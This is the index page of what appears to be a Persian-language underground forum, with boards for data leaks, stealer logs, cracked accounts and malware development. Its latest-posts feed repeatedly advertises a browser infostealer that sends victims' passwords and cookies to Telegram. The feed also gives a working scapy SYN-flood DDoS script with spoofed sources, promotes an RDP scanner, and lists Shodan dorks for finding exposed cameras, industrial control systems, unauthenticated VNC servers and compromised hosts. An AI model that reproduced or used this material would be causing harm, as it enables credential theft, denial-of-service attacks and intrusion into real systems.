Jump to content
      1. Announcements

        News and updates regarding the forums.

        2
        posts
        2
        topics
      2. Introductions

        Introduce yourself and welcome new members to the forum.
        1
        post
        1
        topics
      3. World News

        Discuss real world events and news here.

        6
        posts
        6
        topics
      4. The Lounge

        Talk casually about various topics within reason.

        3
        posts
        3
        topics
      5. Anime & Manga

        Discuss various things related to Manga and Anime.
        2
        posts
        2
        topics
      6. Giveaways & Freebies

        In the giving mood? All Giveaways or Freebies content should be posted here.

        3
        posts
        3
        topics
      7. Music & Videos

        Talk about your favorite music and videos here.
        1
        post
        1
        topics
      8. General Tutorials

        Post tutorials that don't fit into any other topics here.
        3
        posts
        3
        topics
      1. Games

        Game Leaks are posted here. Code, Plugins, Leaked Videos or anything similar to that may be posted here.
        • No posts here yet
      2. Databases

        Database leaks are posted here.

        2
        posts
        2
        topics
      3. Stealer Logs

        Forum where you can post Stealer logs.

        • No posts here yet
      4. Other Leaks

        Ransomware Leaks, Stealer logs, Scrapes, Leads or other kinds of data that isn't considered a leaked database.

        1
        post
        1
        topics
      5. Database Discussion

        Forum where you can discuss & request databases.

        • No posts here yet
      6. Cracked Accounts

        Cracked accounts for various platforms are posted here.
        3
        posts
        3
        topics
      7. Combolists

        Combolists are posted here (Cracked lines from Databases).

        • No posts here yet
      8. HackTheBox

        This forum is reserved for leaking HackTheBox Flags, this is a online game that tests your hacking skills.
        1
        post
        1
        topics
      1. Services

        Have a service to offer? Post your Thread in one of the designated sections. This is a Sales only section, no Buyers / Requests.

        2
        posts
        2
        topics
      2. Sellers Place

        A place for sellers to post various products they have.

        7
        posts
        7
        topics
      3. Buyers Place

        A forum for buyers to create threads asking for products they wish to buy.
        1
        post
        1
        topics
      4. Scam Reports

        Report users of this forum for scamming.

        • No posts here yet
      1. Cracking Discussion

        Discuss various cracking tools, methods, and more.
        5
        posts
        5
        topics
      2. Cracking Tutorials

        Tutorials about cracking using Sentry MBA, Openbullet and similar.

        3
        posts
        3
        topics
      3. Premade Configs

        Find the configs to all majorly used cracking tools such as OpenBullet, SentryMBA, STORM and BlackBullet.
        • No posts here yet
      4. Proxies

        If you're looking for proxies, want to share some or need help.
        • No posts here yet
      5. Hash Cracking

        Discuss techniques, tools, and methodologies surrounding hash cracking.

        • No posts here yet
      1. General

        Discuss and ask questions about programming.

        5
        posts
        5
        topics
      2. Malware Development

        Discuss the trials and tribulations of malware development, get some help or find some inspiration.
        3
        posts
        3
        topics
      3. Reverse Engineering

        Learn about the analysis and deconstruction of software, hardware, and systems to understand their functionality.
        • No posts here yet
      4. Exploit & POCs

        Need some help with the latest CVE? Feel free to ask here.
        2
        posts
        2
        topics
    • Latest Posts

      • Browser_Bkup_vip.exe [Browser BkUp - نسخه VIP]   ابزاری قدرتمند برای سرقت اطلاعات و استخراج کامل اطلاعات مرورگرها، طراحی‌شده توسط Itachi. این ابزار مناسب افرادی‌ست که نیاز به دیتایه کامل مرور گر ها دارن (در شرایط خاص) کامل از اطلاعات مرورگرهای مختلف دارند یا در حوزه تحلیل امنیتی فعالیت می‌کنند.   ویژگی‌های کلیدی: استخراج کامل رمزهای ذخیره‌شده (Passwords) دریافت کوکی‌های فعال و نشست‌ها (Cookies) تاریخچه کامل مرور (History) اطلاعات فرم‌های پر شده (Autofill) لیست دانلودها (Downloads) بوکمارک‌ها با ساختار کامل JSON ذخیره‌سازی مستقیم اطلاعات به فرمت خوانا (TXT/JSON/DB) ارسال مستقیم فایل‌ها به ربات تلگرام رابط کاربری گرافیکی سایبری (سبز-مشکی) بدون نیاز به دسترسی Administrator برای عملکرد عادی   مرورگرهای پشتیبانی‌شده: Google Chrome Microsoft Edge Brave Browser Opera   خروجی‌ها به‌صورت مرتب در دسکتاپ ذخیره می‌شوند و به‌صورت رمزگذاری‌شده از طریق تلگرام نیز قابل دریافت هستند.   مناسب برای: سرقت اطلاعات از مرورگرها بازیابی اطلاعات از پروفایل آسیب‌دیده تحلیل امنیتی در شبکه یا سیستم‌های هدف   ارتباط و دریافت نسخه جدید: https://forum.zerodey.ir/ https://t.me/zirzamincybery0 https://t.me/ir_itachi_ir
      • لیست کامل ناشناس شدن در وب (آموزشی + ابزار + اشاره کدنویسی)   ۱. سیستم‌عامل ناشناس   ابزار: Tails OS   اجرا از USB بدون ذخیره‌سازی   تمام ترافیک از Tor عبور می‌کنه     آموزش:     1. نصب روی USB با Balena Etcher           ---   ۲. مرورگر امن و ناشناس   ابزار: Tor Browser   عبور از چند نود رمزنگاری‌شده   مخفی کردن IP     افزونه‌ها (داخل Tor یا Firefox قابل نصب):   NoScript: بلاک JS   CanvasBlocker: جلوگیری از fingerprint   uBlock Origin: بلاک تبلیغات و trackerها         ---   ۳. حذف اطلاعات مخفی (Metadata)   ابزار: ExifTool (ویندوز، لینوکس، اندروید ترموکس)   مثال کدنویسی (ترموکس):   pkg install exiftool exiftool -all= photo.jpg       ---   ۴. جلوگیری از نشت WebRTC   آموزش (در فایرفاکس یا Tor):   وارد آدرس about:config   دنبال media.peerconnection.enabled   مقدارشو بذار false         ---   ۵. استفاده از موتور جستجوی ناشناس   ابزارها:   DuckDuckGo   Searx         ---   ۶. VPN قبل از Tor (برای مخفی کردن اینکه از Tor استفاده می‌کنی)   ابزار پیشنهادی:   Mullvad VPN (بدون نیاز به ایمیل، قابل پرداخت با XMR)     نکته: قبل از باز کردن Tor، VPN رو روشن کن.       ---   ۷. ساخت ایمیل و اکانت ناشناس   ابزارها:   ProtonMail (با Tor باز کن)   Tutanota   GuerillaMail (موقت)         ---   ۸. پرداخت ناشناس با رمزارز   پیشنهاد: Monero (XMR) به جای Bitcoin   نرم‌افزارها:   Monero GUI Wallet   Cake Wallet (برای موبایل)         ---   ۹. ساخت ماشین مجازی (VM) ایزوله   ابزار: VirtualBox + Kali Linux یا Tails OS   دستور نصب در لینوکس:   sudo apt install virtualbox       ---   ۱۰. اسکریپت ساده تغییر MAC Address (در لینوکس یا ترموکس)   ابزار: macchanger   کد نمونه:   sudo apt install macchanger sudo ifconfig wlan0 down sudo macchanger -r wlan0 sudo ifconfig wlan0 up       ---   ۱۱. DNS امن و بدون لاگ   پیشنهاد:   DNSCrypt   NextDNS         ---   ۱۲. ارتباط ناشناس (چت/ایمیل/فایل)   ابزارها:   Session (جایگزین Signal)   OnionShare (برای اشتراک امن فایل)   CryptPad (دفترچه یادداشت رمزنگاری‌شده)
      • برای انجام یک حمله‌ی منع سرویس توزیع‌شده (DDoS) در پایتون، می‌توانید از کتابخانه‌ی `scapy` برای ساخت و ارسال بسته‌ها به سرور هدف استفاده کنید. در اینجا یک مثال ساده از نحوه‌ی ایجاد یک حمله‌ی DDoS با استفاده از `scapy` آورده شده است:   from scapy.all import * def perform_ddos_attack(target_ip, packets_per_second): packet = IP(src=RandIP(), dst=target_ip) / TCP(dport=80, flags="S") send(packet, loop=1, inter=1/packets_per_second) target_ip = "192.168.1.100" packets_per_second = 1000 perform_ddos_attack(target_ip, packets_per_second) این اسکریپت بسته‌های TCP SYN جعلی را با سرعت ۱۰۰۰ بسته در ثانیه به آدرس IP هدف مشخص شده ارسال می‌کند. تابع RandIP() برای تولید یک آدرس IP تصادفی برای منبع هر بسته استفاده می‌شود که به جلوگیری از شناسایی توسط برخی از فایروال‌ها کمک می‌کند.   لطفاً توجه داشته باشید که این اسکریپت فقط برای اهداف آموزشی است و نباید برای هیچ فعالیت مخربی استفاده شود. قبل از انجام هرگونه حمله DDoS، همیشه مجوز مناسب را دریافت کنید.   به یاد داشته باشید، حملات DDoS را می‌توان با استفاده از تکنیک‌های مختلفی مانند محدود کردن سرعت، فیلتر کردن و استفاده از ابزارها و تکنیک‌های پیچیده‌تر کاهش داد.
      • 1. Kevin Mitnick   هک سیستم‌های شرکت‌های بزرگ مثل نوکیا و موتورولا. مجازات: ۵ سال زندان (۸ ماه در انفرادی).     ---   2. Albert Gonzalez   سرقت اطلاعات ۱۷۰ میلیون کارت اعتباری. مجازات: ۲۰ سال زندان.     ---   3. Gary McKinnon   هک سیستم‌های ناسا و ارتش آمریکا. مجازات: تا مرز استرداد به آمریکا پیش رفت؛ در نهایت زندانی نشد ولی زندگی‌ش به شدت آسیب دید.     ---   4. Adrian Lamo   نفوذ به نیویورک تایمز و مایکروسافت. مجازات: حبس خانگی و جریمه مالی؛ بعداً خودش افشاگر شد (اطلاعات چلسی منینگ رو لو داد).     ---   5. Jonathan James   در نوجوانی به ناسا نفوذ کرد و کدهایی حساس برداشت. مجازات: ۶ ماه حبس خانگی و ممنوعیت استفاده از کامپیوتر. نکته تلخ: چند سال بعد خودکشی کرد.     ---   6. Marcus Hutchins (MalwareTech)   هکری که WannaCry رو متوقف کرد؛ ولی قبلاً بدافزار نوشته بود. مجازات: دستگیر شد ولی با همکاری با FBI بخشیده شد.     ---   7. Anonymous (گروه)   فعالیت‌های گسترده سیاسی، نفوذ به سایت‌های دولتی، پلیس و... مجازات: بعضی از اعضا دستگیر و تا ۱۰ سال زندان گرفتن   برای پایان :   «هک غیرقانونی شاید اولش جذاب به‌نظر بیاد، ولی تهش می‌تونه آینده‌تو نابود کنه. مسیر درست، هک قانونیه.»   TOR
      • سریال‌ها:   1. Mr. Robot – دقیق و واقع‌گرایانه درباره یک هکر افسرده.     2. Person of Interest – پیش‌بینی جرم با هوش مصنوعی.     3. Black Mirror – تکنولوژی و آینده تاریک انسان.     4. Silicon Valley – کمدی درباره برنامه‌نویسان استارتاپ.     5. The IT Crowd – طنز IT در اداره.     6. Halt and Catch Fire – رقابت در دنیای کامپیوترهای دهه ۸۰.     7. Scorpion – نابغه‌های تکنولوژی و حل بحران‌ها.     8. StartUp – درباره ساخت ارز دیجیتال و دارک‌نت.     9. CSI: Cyber – شاخه سایبری پلیس آمریکا.     10. Devs – شرکت اسرارآمیز و محاسبات کوانتومی.     11. 3% – جامعه‌ سایبری آینده‌نگر و طبقه‌بندی افراد.     12. Utopia (UK) – توطئه‌هایی درباره اطلاعات سری.     13. Travelers – سفر در زمان با کمک هوش مصنوعی.     14. The Code (Australia) – هک و افشای اسرار دولتی.     15. ReBoot: The Guardian Code – سریال نوجوانانه درباره هکرهای دیجیتال.         ---   فیلم‌ها:   1. The Matrix – دنیای شبیه‌سازی‌شده و بیداری یک هکر.     2. Hackers (1995) – نوجوانان هکر علیه یک توطئه.     3. Snowden (2016) – زندگی ادوارد اسنودن.     4. Who Am I (2014) – گروه هکری در آلمان.     5. Live Free or Die Hard – حمله سایبری به آمریکا.     6. The Net (1995) – هویت ربایی از طریق اینترنت.     7. Swordfish (2001) – هکری و عملیات غیرقانونی.     8. Blackhat (2015) – همکاری هکر و پلیس برای توقف حمله.     9. WarGames (1983) – نوجوانی که به سیستم نظامی وصل می‌شود.     10. Takedown (2000) – داستان واقعی کوین میتنیک.     11. Tron (1982) – ورود یک برنامه‌نویس به دنیای کامپیوتر.     12. Ghost in the Shell – سایبرپانک و بدن سایبری.     13. Eagle Eye (2008) – هوش مصنوعی کنترل‌گر.     14. Untraceable (2008) – قاتل اینترنتی که ردیابی نمی‌شود.     15. The Fifth Estate (2013) – داستان ویکی‌لیکس و جولین آسانژ.     16. Anon (2018) – جامعه‌ای بدون حریم خصوصی.     17. Open Windows (2014) – هک از طریق دوربین‌ها و شبکه‌ها.     18. Firewall (2006) – متخصص امنیت بانک گرفتار باج‌گیری.     19. Antitrust (2001) – ب رنامه‌نویسی که با شرکت مشکوک روبرو می‌شود.     20. Enemy of the State (1998) – تعقیب و مراقبت دیجیتالی دولت.     TOR
      • 🔥 RDP SCANNER PRO v2.0 (NLA CHECKER) 🔥 ━━━━━━━━━━━━━━━━ ⚙️ Features: ├─🚀 Very Faster than public versions ├─✅ More options  └─🌐 Better detecting (see video) 💎 Benefits: - Save 90% Scanning Time ⏳→⚡️ - Cross-Platform Compatibility(Windows & python ) - Nice for port private and big ip file (to 1 terabyte ) Join to our channel : @MaFiaCrackers     👨💻 *Developer*:  @V0r3x | @MaF1a_B0Y | 24/7 Technical Support Scanner by @MaFiaCrackers.exe
      • [Itachi Browser BkUp - نسخه VIP]   ابزاری قدرتمند برای سرقت اطلاعات و استخراج کامل اطلاعات مرورگرها، طراحی‌شده توسط Itachi. این ابزار مناسب افرادی‌ست که نیاز به دیتایه کامل مرور گر ها دارن (در شرایط خاص) کامل از اطلاعات مرورگرهای مختلف دارند یا در حوزه تحلیل امنیتی فعالیت می‌کنند.   ویژگی‌های کلیدی: استخراج کامل رمزهای ذخیره‌شده (Passwords) دریافت کوکی‌های فعال و نشست‌ها (Cookies) تاریخچه کامل مرور (History) اطلاعات فرم‌های پر شده (Autofill) لیست دانلودها (Downloads) بوکمارک‌ها با ساختار کامل JSON ذخیره‌سازی مستقیم اطلاعات به فرمت خوانا (TXT/JSON/DB) ارسال مستقیم فایل‌ها به ربات تلگرام رابط کاربری گرافیکی سایبری (سبز-مشکی) بدون نیاز به دسترسی Administrator برای عملکرد عادی   مرورگرهای پشتیبانی‌شده: Google Chrome Microsoft Edge Brave Browser Opera   خروجی‌ها به‌صورت مرتب در دسکتاپ ذخیره می‌شوند و به‌صورت رمزگذاری‌شده از طریق تلگرام نیز قابل دریافت هستند.   مناسب برای: سرقت اطلاعات از مرورگرها بازیابی اطلاعات از پروفایل آسیب‌دیده تحلیل امنیتی در شبکه یا سیستم‌های هدف   ارتباط و دریافت نسخه جدید: https://forum.zerodey.ir/ https://t.me/zirzamincybery0 https://t.me/ir_itachi_ir
      • خیلی وقتا پیش اومده بخاید روی سرورتون ان ال بروت و ران کنید ولی با ارور مواجه شدید🚫 براتون یک ربات کیجن درست کردیم که این مشکل شمارو حل کرده تا توی سریعترین زمان ممکن بتونید ان ال بروت خودتون و اکتیو کنید✔️ Bot 👈Click #Dont_MissUs🏴‍☠️ TeloRdp * AmiraliNq
      • 🚀 Itachi Browser Backup Tool | نسخه1 برای سرقت اطلاعات مرورگر ها! 🧠🔐 💻 یه ابزار تمام‌عیار، شیک و سایبری که سرقت تمام اطلاعات حیاتی مرورگرهای می‌ده: ✅ رمزهای ذخیره‌شده در Chrome، Edge، Brave، firefox ✅ کوکی‌های فعال و قابل‌استفاده از همه مرورگرها ✅ بدون نیاز به دانش فنی! ✅ با محیط گرافیکی سبز-مشکی مخصوص عاشقای هک و امنیت! 😈💻 🛡️ با Itachi، سرقت اطلاعات مرورگر ها 📍 مخصوص افرادی که به امنیت شخصی و آرشیو اطلاعات اهمیت می‌دن. 📦 نصب نداره، فقط اجرا کن و با خیال راحت بکاپ بگیر... یه بار امتحانش کن، همیشه ازش استفاده می‌کنی! Browser_Bkup.exe
      • 📽️ In this Post i ll show you the common ways that hackers Use To Stay Anonymous 😁      Download The video
      • چندین دورک جدید برای پیدا کردن دوربین در وبسایت SHODAN :   دورک های محبوب پیدا کردن دوربین در Shodan "IP Camera" "HTTP/1.1 200 OK" Basic realm="IP Camera" admin/admin web camera Steven General camera search camera - 3,384,969 results Hikvision IP Cameras product:"Hikvision IP Camera" - 2,447,005 results Backdoor exploit at https://ipvm.com/reports/hik-exploit Webcams running on IPCam Client title:"IPCam Client" - 53,753 results Older webcams running on GeoVision server: GeoHttpServer - 34,111 results Vivotek IP cameras server: VVTK-HTTP-Server - 19,984 results Avigilion-brand camera/monitoring devices title:"Avigilon" - 17,181 results DVR CCTV cameras accessible via HTTP 200 ok dvr port:"81" - 6,287 results Netwave-make IP cameras Netwave IP Camera Content-Length: 2574 - 2,508 results A UK-based IP camera provider WWW-Authenticate: "Merit LILIN Ent. Co., Ltd" - 1,398 results Various IP camera/video management system products ACTi - 1,364 results UI3 - the HTML5 web interface for Blue Iris title:"ui3 -" - 875 results Yet another WebCAM software product:"Yawcam webcam viewer httpd" - 406 results Unsecured Linksys webcams title:"+tm01+" - 293 results Unsecured Linksys webcams Screenshot ContaCam Cameras title:"ContaCam" - 180 results Webcams running on webcamXP server: webcamxp - 141 results Webcams running on webcamXP Screenshot Webcams with screenshots webcam has_screenshot:true - 109 results Webcams running on webcam 7 server: "webcam 7" - 85 results Webcams running on webcam 7 Screenshot IP Webcams with screenshots has_screenshot:true IP Webcam - 43 results IP Webcams with screenshots Screenshot Canon-manufactured megapixel security cameras title:"Network Camera VB-M600" - 39 results i-Catcher IP-based CCTV systems server: "i-Catcher Console" - 27 results Linksys WVC80N cameras WVC80N - 19 results Webcams running on Blue Iris title:"blue iris remote view" - 16 results Industrial Control Systems EtherNet/IP port:44818 - 871,702 results S7 port:102 - 852,119 results BACnet port:47808 - 830,900 results Modbus port:502 - 791,691 results Niagara Fox port:1911,4911 product:Niagara - 7,943 results VNC Servers "authentication disabled" "RFB 003.008" - 5,607 results While not always 100% guaranteed to be a system, lots of embedded systems can show up here, along with personal systems. Gas Station Pump Controllers "in-tank inventory" port:10001 - 5,025 results Find gas station pump controllers with accessible inventory data. Gas Station Pump Controllers Screenshot Siemens Industrial Automation "Siemens, SIMATIC" port:161 - 2,760 results IEC 60870-5-104 port:2404 asdu address - 2,627 results DICOM Medical X-Ray Machines "DICOM Server Response" port:104 - 2,193 results More VNC Servers "authentication disabled" port:5900,5901 - 2,159 results Another search term for VNC servers - most are on port 5900 or 5901 as these are VNC display ports. Omron FINS port:9600 response code - 1,607 results DNP3 port:20000 source address - 1,364 results ProConOS port:20547 PLC - 706 results PCWorx port:1962 PLC - 703 results XZERES Wind Turbine title:"xzeres wind" - 263 results MELSEC-Q port:5006,5007 product:mitsubishi - 201 results Door / Lock Access Controllers "HID VertX" port:4070 - 139 results C4 Max Commercial Vehicle GPS Trackers [1m[35mWelcome on console - 32 results C4 Max Commercial Vehicle GPS Trackers Screenshot GaugeTech Electricity Meters "Server: EIG Embedded Web Server" "200 Document follows" - 29 results GaugeTech Electricity Meters Screenshot Open ATM NCR Port:"161" - 22 results Nordex Wind Turbine Farms http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)" - 19 results Voting Machines in the United States "voter system serial" country:US - 17 results Electric Vehicle Chargers "Server: gSOAP/2.8" "Content-Length: 583" - 16 results Traffic Light Controllers / Red Light Cameras mikrotik streetlight - 15 results Siemens HVAC Controllers "Server: Microsoft-WinCE" "Content-Length: 12581" - 6 results HART-IP port:5094 hart-ip - 6 results Fuel Pumps connected to internet "privileged command" GET - 5 results CAREL PlantVisor Refrigeration Units "Server: CarelDataServer" "200 Document follows" - 5 results CAREL PlantVisor Refrigeration Units Screenshot Samsung Electronic Billboards Server: Prismview Player - 3 results Search for electronic billboards managed by Prismview servers. Samsung Electronic Billboards Screenshot Railroad Management "log off" "select the appropriate" - 2 results Automatic License Plate Readers P372 "ANPR enabled" - 1 result Submarine Mission Control Dashboards title:"Slocum Fleet Mission Control" - 1 result Network Infastructure General MySQL Database Search product:MySQL - 2,903,663 results Remote PostgreSQL Connections port:5432 PostgreSQL - 600,520 results Default MongoDB Instances mongodb port:27017 - 68,492 results MongoDB Server Information on Default Port "MongoDB Server Information" port:27017 - 64,947 results Open Elasticsearch Databases port:"9200" all:elastic - 20,913 results Cisco Smart Install smart install client active - 6,294 results Listed Apache CouchDB product:"CouchDB" - 4,651 results Pi-hole Open DNS Servers "dnsmasq-pi-hole" "Recursion: enabled" - 2,854 results Android Root Bridges "Android Debug Bridge" "Device" port:5555 - 2,434 results Polycom Video Conferencing http.title:"- Polycom" "Server: lighttpd" - 2,174 results Jenkins CI "X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard" - 1,464 results Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords Lantronix password port:30718 -secured - 494 results Already Logged-In as root via Telnet "root@" port:23 -login -password -name -Session - 359 results Accessible Kibana Dashboards kibana content-length:217 - 274 results Exposed MongoDB Express Web Interfaces "Set-Cookie: mongo-express=" "200 OK" - 261 results Docker Private Registries "Docker-Distribution-Api-Version: registry" "200 OK" -gitlab - 215 results Citrix Virtual Apps "Citrix Applications:" port:1604 - 152 results PBX IP Phone Gateways PBX "gateway console" -password port:23 - 135 results Telnet Configuration "Polycom Command Shell" -failed port:23 - 23 results Weave Scope Dashboards title:"Weave Scope" http.favicon.hash:567176827 - 10 results Vulnerable CouchDB Instances port:"5984"+Server: "CouchDB/2.1.0" - 2 results Printers General Printer Search printer - 92,694 results HP Printers Remote Restart port:161 hp - 8,692 results Canon Printer HTTP Servers Server: CANON HTTP Server - 6,380 results HTTP Accessible Epson Printers http 200 server epson -upnp - 1,301 results HTTP Accessible Epson Printers Screenshot Samsung Printers with SyncThru Web Service title:"syncthru web service" - 1,112 results Unsecured Telnet Access to Printers port:23 "Password is not set" - 319 results Remote Access to Xerox Printers ssl:"Xerox Generic Root" - 211 results Remote Access to Xerox Printers Screenshot Lexmark Printer Control Panels Printer Type: Lexmark - 141 results Epson Printers via HTTP Server "Server: EPSON-HTTP" "200 OK" - 120 results HP LaserJet Printers via HTTP "HP-ChaiSOE" port:"80" - 61 results Brother Printers Admin Interface "Location: /main/main.html" debut - 49 results Printers with FTP Access Laser Printer FTP Server - 20 results Exposed OctoPrint 3D Printer Controllers title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944 - 17 results Files and Directories Open Lists of Files and Directories http.title:"Index of /" - 277,886 results Filezilla FTP filezilla port:"21" - 168,509 results Samba Shares with Authentication Disabled "Authentication: disabled" port:445 product:"Samba" - 113,230 results Open Lists on Port 80 port:80 title:"Index of /" - 98,587 results FTP Access Without Credentials "220" "230 Login successful." port:21 - 40,296 results Anonymous Access Allowed FTP "Anonymous access allowed" port:"21" - 21,892 results NDMP on FTP Port 10000 ftp port:"10000" - 7,503 results Vulnerable vsftpd Service vsftpd 2.3.4 - 1,705 results QuickBooks Files Shared Over Network "QuickBooks files OverNetwork" -unix port:445 - 23 results Compromised devices and websites Compromised Legacy Systems on Port 4444 port:4444 system32 - 1,111 results General Hacked Label Search hacked - 1,021 results Hacked By in HTTP Title http.title:"Hacked by" - 412 results Compromised Routers Labeled HACKED-ROUTER HACKED-ROUTER - 388 results Compromised Routers hacked-router-help-sos - 371 results Variation of Hacked By Label Search hacked by - 249 results Ransomware Infected RDP Services "attention" "encrypted" port:3389 - 47 results Compromised Hosts Advertising Default Password HACKED-ROUTER-HELP-SOS-HAD-DEFAULT-PASSWORD - 46 results Compromised FTP Servers HACKED FTP server - 23 results Bitcoin Ransomware with Screenshot bitcoin has_screenshot:true - 7 results Bitcoin Ransomware with Screenshot Screenshot Owned By Label in HTTP Title http.title:"0wn3d by" - 6 results Miscellaneous General Dashboard Interfaces http.title:"dashboard" - 354,607 results Control Panel Access Points http.title:"control panel" - 64,160 results Minecraft Servers "Minecraft Server" "protocol 340" port:25565 - 4,413 results Bitcoin Antminer Miners antminer - 1,659 results These devices are often left with default credentials. Bomgar Help Desk Portals "Server: Bomgar" "200 OK" - 354 results Tesla-related Interfaces http.title:"Tesla" - 346 results Everything in North Korea net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24 - 48 results EIG Electricity Meters "Server: EIG Embedded Web Server" "200 Document follows" - 29 results Misconfigured WordPress Installations http.html:"* The wp-config.php creation script uses this file" - 8 results Ethereum Miners ETH - Total speed - 2 results Telegram : @zirzamincybery0
      • آسیب پذیری بحرانی RCE در ماژول SSH در Erlang/OTP   آسیب پذیری با شناسه ی CVE-2025-32433 و شدت بحرانی و امتیاز 10 در ماژول SSH در Erlang/OTP کشف و اصلاح شده که امکان اجرای کد رو به مهاجم احراز هویت نشده، میده.   نسخه های OTP-27.3.3 و OTP-26.2.5.11 و OTP-25.3.2.20 نسخه های اصلاح شده هستن و نسخه های قبل از اینا، تحت تاثیر این آسیب پذیری هستن.   زبان Erlang یک زبان برنامه‌نویسی هستش که برای ساخت سیستمهای مقیاس‌پذیر، مقاوم و با عملکرد بالا طراحی شده. بیشتر در سیستمهای مخابراتی، پیامرسان، تجهیزات شبکه، اینترنت اشیاء، تجهیزات ICS و OT و ابری استفاده میشه.   فریمورک OTP مجموعه‌ای از کتابخانه‌ های استاندارد هستش که همراه Erlang ارائه میشه و ابزارهایی برای مدیریت فرآیندها، ارتباطات شبکه و ... رو فراهم میکنه.   در حالت عادی، سرورهای SSH با نرم‌افزارهایی مثل OpenSSH پیاده‌سازی میشن. اما برخی سیستمها از کتابخانه‌ ی Erlang/OTP برای پیاده‌سازی سرور SSH خودشون استفاده میکنن.   آسیب‌پذیری CVE-2025-32433 در پیاده‌سازی پروتکل SSH که در خود کتابخانه‌ی Erlang/OTP ارائه شده وجود داره یعنی Erlang/OTP یک ماژول داخلی به نام :ssh داره که برای پیاده‌سازی سرورها و کلاینتهای SSH استفاده میشه. این ماژول بخشی از فریمورک OTP هستش و به توسعه‌دهندگان اجازه میده سرور یا کلاینت SSH بسازن. اگه محصول یا توسعه دهنده ای از این ماژول استفاده کنه، تحت تاثیر این آسیب پذیری قرار داره.   اگه سرویس SSH با امتیاز root اجرا بشه، مهاجم دسترسی root داره.   داده های خام در شودان، نشون میده که 685,966 سرور در حال اجرای Erlang/OTP هستن که سهم ایران 881 مورد هستش.   نکته جالب اینکه گویا اکسپلویت این آسیب پذیری هم ساده هستش و افرادی تونستن با AI
      • سایت‌های مناسب برای تمرین حملات (مخصوصاً تست DDoS) 1. Metasploitable2 یه ماشین مجازی آسیب‌پذیر که می‌تونی روش انواع حملات رو تمرین کنی (از جمله DDoS سبک داخل شبکه مجازی). نصب می‌شه کنار Kali Linux یا ترموکس با VNC. 2. DVWA - Damn Vulnerable Web Application مخصوص تمرین حملات وبی مثل SQLi، XSS، و محدود DDoS با flooding فرم لاگین یا requestهای زیاد. برای اجرا باید یه سرور لوکال (XAMPP یا LAMP) راه بندازی. 3. Hack The Box - HTB ماشین‌های واقعی برای تست نفوذ. بعضی چالش‌ها اجازه تست حملات DoS سبک رو می‌دن. رایگان ثبت‌نام می‌کنی و با invite وارد می‌شی. 4. TryHackMe آموزش‌ها و محیط‌های تمرینی برای مبتدی تا حرفه‌ای. برخی روم‌ها مثل "OWASP Top 10" یا "Red Teaming" به تست حملات DDoS هم اشاره دارن. 5. PentesterLab محیط امن برای تمرین حملات وب از جمله دوز نرم (Soft DoS) مثل resource exhaustion یا brute force. -TOR-
      • سلام خدمت دوستان عزیز من برنامه ای ساختم که شما میتونید آموزش ترموکس رو داخلش ببینید حلا ترموکس واسه کسایی که سیستم ندارند و می‌خواهند داخل گوشی هک کنند مناسبه اپ هم مخصوص موبایل است.
      • 🌐 حملات سایبری بین‌المللی   استفاده دولت‌ها از ابزار ClickFix:      افزایش تهدیدات زیرساختی:      گروه CyberAv3ngers:          ---   💰 هک‌های مالی و رمزارز   سرقت رمزارز توسط کره شمالی:      حمله به بانک‌های ایران:          ---   🧠 همکاری‌های جدید در فضای سایبری   همکاری هکرهای دو لتی و غیررسمی:          ---
      • Hold your phone near your card... and they drain your bank account. A new Android malware-as-a-service, SuperCard X, is targeting Italians with NFC relay attacks—letting cybercriminals remotely steal card data and pull off ATM & PoS fraud. 👉 Learn how it works: https://thehackernews.com/2025/04/supercard-x-android-malware-enables.html Google’s now working on a new Android update to block risky app installs. But until then—stay sharp. Think before tapping.
    • Recent Achievements

      • itachi earned a badge
        Collaborator
      • devmrreza earned a badge
        Conversation Starter
      • vallsta earned a badge
        First Post
      • V0r3x earned a badge
        Conversation Starter
      • AmiraliTelo earned a badge
        Reacting Well
    ×
    ×
    • Create New...